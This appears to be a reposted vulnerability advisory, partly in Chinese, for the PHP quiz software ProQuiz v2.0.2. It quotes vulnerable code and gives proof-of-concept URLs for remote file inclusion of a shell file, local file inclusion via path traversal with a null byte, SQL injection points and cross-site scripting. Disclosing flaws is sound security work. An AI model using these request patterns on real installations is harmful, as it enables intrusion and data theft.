标题: ProQuiz v2.0.2 - Multiple Vulnerabilities
作者: L0n3ly-H34rT http://www.2cto.com/ l0n3ly_h34rt@hotmail.com
程序官网: http://proquiz.softon.org/
下载地址: http://code.google.com/p/proquiz/downloads/list
测试平台: Linux/Windows
 
1远程文件包含 :
 
* In File (my_account.php) in line 114 & 115 :
 
if($_GET['action']=='getpage' && !empty($_GET['page'])){
@include_once($_GET['page'].'.php');
 
测试证明
First register and login in your panel and paste that's url e.g. :
 
http://www.2cto.com /full/my_account.php?action=getpage&page=http://127.0.0.1/shell.txt?
 
*注释 :
 
需要 allow_url_include=On
 
-----------------------------------------------------------------------
 
2 本地文件包含缺陷 :
 
* In File (my_account.php) in line 114 & 115 :
 
if($_GET['action']=='getpage' && !empty($_GET['page'])){
@include_once($_GET['page'].'.php');
 
* P.O.C :
 
First register and login in your panel and paste that's url e.g. :
 
http://www.2cto.com /full/my_account.php?action=getpage&page=../../../../../../../../../../windows/win.ini%00.jpg
 
*注释 :
 
同样需要 magic_quotes_gpc = Off
 
---------------------------------------------------------------------
 
3- 远程SQL注射&盲注
 
* In Two Files :
 
A- First ( answers.php ) in line 55 :
 
<?php echo $_GET['instid']; ?>
 
B- Second ( functions.php ) In :
 
$_POST['email']
 
$_POST['username']
 
*测试证明:
 
A- First :
 
http://www.2cto.com /full/answers.php?action=answers&instid=[SQL]
 
B- Second :
 
About Email :
 
In URL:
 
http://127.0.0.1/full/functions.php?action=recoverpass
 
Inject Here In POST Method :
 
email=[SQL]
 
About Username :
 
In URL:
 
http://127.0.0.1/full/functions.php?action=edit_profile&type=username
 
Inject Here In POST Method :
 
username=[SQL]
 
-------------------------------------------------------------------------------------
 
4 - Cross Site Scripting :
 
e.g.: http://127.0.0.1/full/answers.php?action=answers&instid=[XSS]
 
-----------------------------------------------------------------------------------
 
# Greetz to my friendz